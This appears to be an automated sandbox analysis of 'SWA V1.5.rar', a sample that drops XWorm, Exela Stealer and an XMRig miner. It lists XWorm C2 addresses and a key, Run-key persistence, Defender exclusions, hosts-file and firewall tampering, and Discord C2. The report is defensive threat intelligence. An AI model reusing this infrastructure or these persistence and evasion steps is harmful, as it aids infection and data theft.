Analysis
-
max time kernel
619s -
max time network
641s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-11-2024 18:53
Static task
static1
Behavioral task
behavioral1
Sample
SWA V1.5.rar
Resource
win10v2004-20241007-en
Errors
General
-
Target
SWA V1.5.rar
-
Size
31.8MB
-
MD5
71208a810a5cdbf1efbd160ba43e8555
-
SHA1
5f7a2b275e0ca9d3474683e605b3cf5c5251a8b4
-
SHA256
424cb0798a709bd9ff7a96f067d51f69db5bbb0f1d73d738e10968a75f7102e8
-
SHA512
6aed4ebfc74efe395b78fd7499ffbb1e8f3ce15b6c414dbe50c3f5e8a2bffb2c721be64f4ff36511e33612c57963a8fa375d7570b9164dfcc37fa1782fea9913
-
SSDEEP
786432:ydJYqGw5xfjVisUIqfGSzBPmJcVxNmgYDlEZIKEe0l:ydmqxzrGNlPkcnNJImZMe0l
Malware Config
Extracted
xworm
127.0.0.1:52872
23.ip.gl.ply.gg:52872
127.0.0.1:61713
street-navy.gl.at.ply.gg:61713
key-spare.gl.at.ply.gg:64178
127.0.0.1:60766
23.ip.gl.ply.gg:60766
127.0.0.1:60342
important-standing.gl.at.ply.gg:60342
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
xworm
5.0
kingdom-nato.gl.at.ply.gg:1260
cobHi7aqLVJbbtyr
-
Install_directory
%AppData%
-
install_file
svhost.exe
Signatures
-
Detect Xworm Payload 14 IoCs
resource yara_rule behavioral1/files/0x0009000000023c92-54.dat family_xworm behavioral1/memory/4988-61-0x0000000000F00000-0x0000000000F16000-memory.dmp family_xworm behavioral1/files/0x0008000000023cc8-183.dat family_xworm behavioral1/memory/876-185-0x00000000009F0000-0x0000000000A02000-memory.dmp family_xworm behavioral1/files/0x0009000000023cca-257.dat family_xworm behavioral1/memory/4492-258-0x00000000006E0000-0x00000000006FA000-memory.dmp family_xworm behavioral1/files/0x0003000000022e00-473.dat family_xworm behavioral1/files/0x000d000000023b64-482.dat family_xworm behavioral1/memory/4996-497-0x0000000000D30000-0x0000000000D4A000-memory.dmp family_xworm behavioral1/memory/3588-498-0x00000000000C0000-0x00000000000D8000-memory.dmp family_xworm behavioral1/files/0x001a0000000234ae-508.dat family_xworm behavioral1/files/0x0009000000023ce1-516.dat family_xworm behavioral1/memory/4124-521-0x0000000000870000-0x0000000000886000-memory.dmp family_xworm behavioral1/memory/4968-527-0x0000000000B70000-0x0000000000BB2000-memory.dmp family_xworm -
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Exelastealer family
-
Xmrig family
-
Xworm family
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/5428-801-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-800-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-803-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-806-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-807-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-805-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/5428-804-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 62 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5196 powershell.exe 5864 Process not Found 5308 powershell.exe 6016 powershell.exe 5644 powershell.exe 5684 powershell.exe 3952 powershell.exe 5708 powershell.exe 1940 Process not Found 2664 Process not Found 848 powershell.exe 6064 powershell.exe 5720 powershell.exe 5976 powershell.exe 4360 powershell.exe 3320 powershell.exe 2820 powershell.exe 4800 powershell.exe 3736 Process not Found 996 Process not Found 5332 Process not Found 5648 Process not Found 1852 Process not Found 2032 powershell.exe 924 powershell.exe 4764 powershell.exe 5388 powershell.exe 2924 powershell.exe 4416 Process not Found 1464 powershell.exe 4684 powershell.exe 1868 powershell.exe 5964 powershell.exe 2664 powershell.exe 5208 powershell.exe 5184 powershell.exe 2032 powershell.exe 2112 powershell.exe 3904 powershell.exe 5744 powershell.exe 2928 powershell.exe 5288 powershell.exe 3360 Process not Found 5508 Process not Found 2300 powershell.exe 2036 Process not Found 3572 powershell.exe 5192 Process not Found 3404 powershell.exe 4684 powershell.exe 2624 Process not Found 644 powershell.exe 2612 powershell.exe 3936 powershell.exe 6048 powershell.exe 5576 powershell.exe 6140 powershell.exe 1524 powershell.exe 5660 powershell.exe 4440 powershell.exe 4304 Process not Found 2608 Process not Found -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 396 netsh.exe 2968 netsh.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Nursultan.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Nursultan.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Nursultan.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Nursultan.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation shellbag_analyzer_cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Process not Found -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2556 cmd.exe 848 powershell.exe -
Drops startup file 14 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk abayounda.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk нужно.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk нужно.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk авааа.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nursultan Crack.lnk Nursultan Beta.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk gay.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk abayounda.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk gay.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk rustme.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk юзерок.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nursultan Crack.lnk Nursultan Beta.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Process not Found -
Executes dropped EXE 64 IoCs
pid Process 3168 SWA V1.5.exe 3556 5.exe 4988 abayounda.exe 3324 нужно2.exe 384 компоненты.exe 3512 компоненты.exe 876 нужно.exe 4492 rustme.exe 4636 build.exe 1532 Nursultan.exe 3520 shellbag_analyzer_cleaner (1).exe 3836 4.exe 4996 авааа.exe 3588 юзерок.exe 916 Nursultan.exe 2032 shellbag_analyzer_cleaner.exe 2020 shellbag_analyzer_cleaner.exe 4124 Nursultan Beta.exe 4968 gay.exe 4644 rustme.exe 4468 shellbag_analyzer_cleaner.exe 2140 gay.exe 5040 авааа.exe 4316 юзерок.exe 2344 Nursultan.exe 4100 shellbag_analyzer_cleaner.exe 4308 Nursultan Beta.exe 3848 rustme.exe 5952 shellbag_analyzer_cleaner.exe 5980 gay.exe 4936 shellbag_analyzer_cleaner.exe 4380 авааа.exe 3092 юзерок.exe 4520 gay.exe 5748 Nursultan.exe 5816 shellbag_analyzer_cleaner.exe 5772 Nursultan Beta.exe 5808 rustme.exe 5764 shellbag_analyzer_cleaner.exe 5628 gay.exe 5948 shellbag_analyzer_cleaner.exe 5320 gay.exe 3948 shellbag_analyzer_cleaner.exe 5148 gay.exe 5372 авааа.exe 5348 юзерок.exe 3744 Nursultan.exe 5688 shellbag_analyzer_cleaner.exe 4140 Nursultan Beta.exe 5404 rustme.exe 3688 shellbag_analyzer_cleaner.exe 2112 gay.exe 724 shellbag_analyzer_cleaner.exe 5176 gay.exe 5336 shellbag_analyzer_cleaner.exe 5796 gay.exe 5776 shellbag_analyzer_cleaner.exe 1304 gay.exe 4320 авааа.exe 5800 юзерок.exe 5976 Nursultan.exe 1420 shellbag_analyzer_cleaner.exe 1592 Nursultan Beta.exe 408 rustme.exe -
Loads dropped DLL 62 IoCs
pid Process 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 3512 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe 916 компоненты.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 33 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\компоненты = "C:\\Users\\Admin\\AppData\\Local\\Temp\\компоненты.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" gay.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rustme = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rustme.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\компоненты = "C:\\Users\\Admin\\AppData\\Local\\Temp\\компоненты.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build = "C:\\Users\\Admin\\AppData\\Local\\Temp\\build.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\нужно2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\нужно2.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\ProgramData\\svhost.exe" авааа.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rustme = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rustme.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" нужно.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" rustme.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\нужно2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\нужно2.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" gay.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\нужно = "C:\\Users\\Admin\\AppData\\Local\\Temp\\нужно.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shellbag_analyzer_cleaner (1) = "C:\\Users\\Admin\\AppData\\Local\\Temp\\shellbag_analyzer_cleaner (1).exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" abayounda.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\shellbag_analyzer_cleaner (1) = "C:\\Users\\Admin\\AppData\\Local\\Temp\\shellbag_analyzer_cleaner (1).exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\ProgramData\\svhost.exe" юзерок.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\abayounda = "C:\\Users\\Admin\\AppData\\Local\\Temp\\abayounda.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sites = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sites.bat" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\4.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sites = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Sites.bat" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\abayounda = "C:\\Users\\Admin\\AppData\\Local\\Temp\\abayounda.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\нужно = "C:\\Users\\Admin\\AppData\\Local\\Temp\\нужно.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build = "C:\\Users\\Admin\\AppData\\Local\\Temp\\build.exe" SWA V1.5.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Crack = "C:\\Users\\Admin\\AppData\\Roaming\\Nursultan Crack" Nursultan Beta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 146 discord.com 159 discord.com 67 discord.com 68 discord.com 69 discord.com 145 discord.com -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com 28 ip-api.com 30 ip-api.com 152 ip-api.com 278 ip-api.com 309 ip-api.com -
pid Process 1728 cmd.exe 6116 ARP.EXE -
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4992 tasklist.exe 4300 tasklist.exe 2272 tasklist.exe 4360 tasklist.exe 5264 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4208 cmd.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4636 set thread context of 5428 4636 build.exe 324 -
resource yara_rule behavioral1/files/0x0007000000023ccf-167.dat upx behavioral1/memory/3512-171-0x00007FFE047B0000-0x00007FFE04D98000-memory.dmp upx behavioral1/files/0x0007000000023cc5-191.dat upx behavioral1/memory/3512-194-0x00007FFE1B0F0000-0x00007FFE1B0FF000-memory.dmp upx behavioral1/memory/3512-192-0x00007FFE0BDD0000-0x00007FFE0BDF4000-memory.dmp upx behavioral1/files/0x0007000000023c9b-190.dat upx behavioral1/files/0x0007000000023c9f-207.dat upx behavioral1/files/0x0007000000023ca5-213.dat upx behavioral1/files/0x0007000000023ca2-210.dat upx behavioral1/files/0x0007000000023ca4-212.dat upx behavioral1/files/0x0007000000023ca3-211.dat upx behavioral1/files/0x0007000000023ca1-209.dat upx behavioral1/files/0x0007000000023ca0-208.dat upx behavioral1/memory/3512-216-0x00007FFE05C60000-0x00007FFE05C79000-memory.dmp upx behavioral1/files/0x0007000000023c99-219.dat upx behavioral1/memory/3512-222-0x00007FFE05B60000-0x00007FFE05B8D000-memory.dmp upx behavioral1/memory/3512-221-0x00007FFE05B90000-0x00007FFE05BA9000-memory.dmp upx behavioral1/files/0x0007000000023cd1-230.dat upx behavioral1/files/0x0007000000023c9e-220.dat upx behavioral1/files/0x0007000000023cc6-236.dat upx behavioral1/files/0x0007000000023cc4-238.dat upx behavioral1/memory/3512-241-0x00007FFE054C0000-0x00007FFE054EE000-memory.dmp upx behavioral1/memory/3512-245-0x00007FFE05B30000-0x00007FFE05B53000-memory.dmp upx behavioral1/memory/3512-240-0x00007FFE05700000-0x00007FFE05873000-memory.dmp upx behavioral1/files/0x0007000000023c98-269.dat upx behavioral1/memory/3512-272-0x00007FFE04FA0000-0x00007FFE04FB4000-memory.dmp upx behavioral1/memory/3512-271-0x00007FFE04FC0000-0x00007FFE04FD2000-memory.dmp upx behavioral1/memory/3512-270-0x00007FFE05370000-0x00007FFE05385000-memory.dmp upx behavioral1/memory/3512-277-0x00007FFE04ED0000-0x00007FFE04EE4000-memory.dmp upx behavioral1/memory/3512-276-0x00007FFE04760000-0x00007FFE0477B000-memory.dmp upx behavioral1/memory/3512-275-0x00007FFE04050000-0x00007FFE0416C000-memory.dmp upx behavioral1/memory/3512-274-0x00007FFE04780000-0x00007FFE047A2000-memory.dmp upx behavioral1/memory/3512-273-0x00007FFE047B0000-0x00007FFE04D98000-memory.dmp upx behavioral1/memory/3512-243-0x00007FFE04250000-0x00007FFE045C5000-memory.dmp upx behavioral1/memory/3512-242-0x00007FFE05400000-0x00007FFE054B8000-memory.dmp upx behavioral1/files/0x0007000000023cd0-215.dat upx behavioral1/memory/3512-218-0x00007FFE1AA90000-0x00007FFE1AA9D000-memory.dmp upx 